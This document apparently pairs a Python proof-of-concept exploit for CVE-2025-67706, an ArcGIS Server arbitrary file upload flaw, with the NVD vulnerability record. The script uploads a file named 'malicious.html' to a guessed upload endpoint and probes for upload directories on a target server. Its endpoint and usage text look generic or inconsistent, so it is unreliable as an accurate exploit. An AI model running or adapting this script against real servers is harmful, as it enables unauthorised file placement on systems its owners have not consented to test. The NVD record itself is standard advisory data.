CVE-2025-67706

import requests import sys # CVE-2025-67706 PoC - ArcGIS Server Arbitrary File Upload # Target: ArcGIS Server versions 11.5 and earlier # This PoC demonstrates file upload to vulnerable endpoint def upload_file(target_url, file_content): """ Upload arbitrary file to ArcGIS Server Args: target_url: Base URL of ArcGIS Server file_content: Content of file to upload Returns: Response from server """ upload_endpoint = f"{target_url}/arcgis/rest/services/upload" files = { 'file': ('malicious.html', file_content, 'text/html') } try: response = requests.post(upload_endpoint, files=files, timeout=30) return response except requests.exceptions.RequestException as e: print(f"Error: {e}") return None def check_upload_directory(target_url): """ Enumerate upload directories on target server """ dirs = [ '/arcgis/uploads/', '/server/uploads/', '/arcgisserver/uploads/' ] for dir_path in dirs: try: response = requests.get(f"{target_url}{dir_path}", timeout=10) if response.status_code == 200: print(f"[+] Found upload directory: {dir_path}") except: pass if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python cve-2025-67706.py <target_url> ") print("Example: python cve-2025-67706.py http://target.com:6080 malicious.html") sys.exit(1) target = sys.argv[1] filename = sys.argv[2] # Read malicious file content with open(filename, 'r') as f: content = f.read() print(f"[*] Uploading {filename} to {target}") print("[*] Note: Uploaded files are restricted to non-executable locations") response = upload_file(target, content) if response and response.status_code == 200: print("[+] File upload successful") print(f"Response: {response.text}") else: print("[-] File upload failed")

{"cve": {"id": "CVE-2025-67706", "sourceIdentifier": "[email protected]", "published": "2025-12-31T23:15:41.687", "lastModified": "2026-02-19T21:29:24.007", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ArcGIS Server versions 11.5 and earlier on Windows and Linux do not sufficiently validate uploaded files, enabling a remote unauthenticated attacker to upload arbitrary files to the server’s designated upload directories.\n\nHowever, the server’s architecture enforces controls that restrict uploaded files to non‑executable storage locations and prevent modification or replacement of existing application components or system configurations. Uploaded files cannot be executed, leveraged to escalate privileges, or used to access sensitive data.\n\nBecause the issue does not enable execution, service disruption, unauthorized access, or integrity compromise, its impact on confidentiality, integrity, and availability is low. Note that race conditions, secret values, or man‑in‑the‑middle conditions are required for exploitation."}, {"lang": "es", "value": "ArcGIS Server versión 11.5 y anteriores en Windows y Linux no valida correctamente los archivos subidos, lo que permite a atacantes remotos subir archivos arbitrarios. Sin embargo, la explotación está limitada por controles del lado del servidor que impiden la ejecución del contenido subido y no permiten la modificación de archivos de aplicación existentes o configuraciones del sistema. Como resultado, una explotación exitosa tendría un bajo impacto en la confidencialidad, integridad y disponibilidad, y no permitiría la interrupción del servicio, la escalada de privilegios o el acceso no autorizado a datos sensibles."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.2, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.2, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:esri:arcgis_server:*:*:*:*:*:*:*:*", "versionEndIncluding": "11.5", "matchCriteriaId": "EC44DA7C-0CB3-4D79-B502-2B26954DB4DC"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://www.esri.com/arcgis-blog/products/trust-arcgis/administration/arcgis-server-security-2025-update-2-patch", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}